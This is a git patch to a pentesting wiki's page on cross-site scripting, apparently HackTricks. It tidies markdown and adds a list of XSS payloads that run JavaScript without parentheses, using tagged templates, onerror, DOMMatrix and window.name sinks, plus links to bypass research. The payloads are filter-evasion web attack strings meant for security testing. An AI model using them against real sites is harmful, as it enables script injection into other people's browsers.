From fd7e8de8d4799a4828434ea27e907da409be8ba2 Mon Sep 17 00:00:00 2001 From: CPol Date: Fri, 23 Sep 2022 09:06:24 +0000 Subject: [PATCH] GitBook: [#3501] No subject --- .../xss-cross-site-scripting/README.md | 20 +++++++++++++++---- 1 file changed, 16 insertions(+), 4 deletions(-) diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md index e35bddea..8d3707c7 100644 --- a/pentesting-web/xss-cross-site-scripting/README.md +++ b/pentesting-web/xss-cross-site-scripting/README.md @@ -201,7 +201,7 @@ Some **examples**: When your input is reflected **inside the HTML page** or you can escape and inject HTML code in this context the **first** thing you need to do if check if you can abuse `<` to create new tags: Just try to **reflect** that **char** and check if it's being **HTML encoded** or **deleted** of if it is **reflected without changes**. **Only in the last case you will be able to exploit this case**.\ For this cases also **keep in mind** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\ -_**Note: A HTML comment can be closed using\*\*\*\*\*\*\*\***** ****`-->`**** ****or \*\*\*\*****`--!>`**_ +_**Note: A HTML comment can be closed using**** ****`-->`**** ****or**** ****`--!>`**_ In this case and if no black/whitelisting is used, you could use payloads like: @@ -595,12 +595,23 @@ eval(8680439..toString(30))(983801..toString(36)) **JavaScript without parentheses** -```javascript +````javascript alert`1` eval.call`${'alert\x2823\x29'}` eval.apply`${[`alert\x2823\x29`]}` -``` +[].sort.call`${alert}1337` +[].map.call`${eval}\\u{61}lert\x281337\x29` +throw onerror=alert,1337 +Function`x${'alert\x281337\x29'}x``` +'alert\x281337\x29'instanceof{[Symbol['hasInstance']]:eval} +valueOf=alert;window+'' +x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x +// or any DOMXSS sink such as location=name + +window.name='javascript:alert(1)' +Reflect.apply.call`${navigation.navigate}${navigation}${[name]}` +```` * [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md) * [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix) @@ -807,7 +818,7 @@ with(this) ### Obfuscation & Advanced Bypass -* **Different obfuscations in one page:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/) \*\*\*\* +* **Different obfuscations in one page:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/) * [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js) * [https://ooze.ninja/javascript/poisonjs](https://ooze.ninja/javascript/poisonjs) * [https://javascriptobfuscator.herokuapp.com/](https://javascriptobfuscator.herokuapp.com) @@ -816,6 +827,7 @@ with(this) * More sofisticated JSFuck: [https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce](https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce) * [http://utf-8.jp/public/jjencode.html](http://utf-8.jp/public/jjencode.html) * [https://utf-8.jp/public/aaencode.html](https://utf-8.jp/public/aaencode.html) +* [https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses](https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses) ```javascript //Katana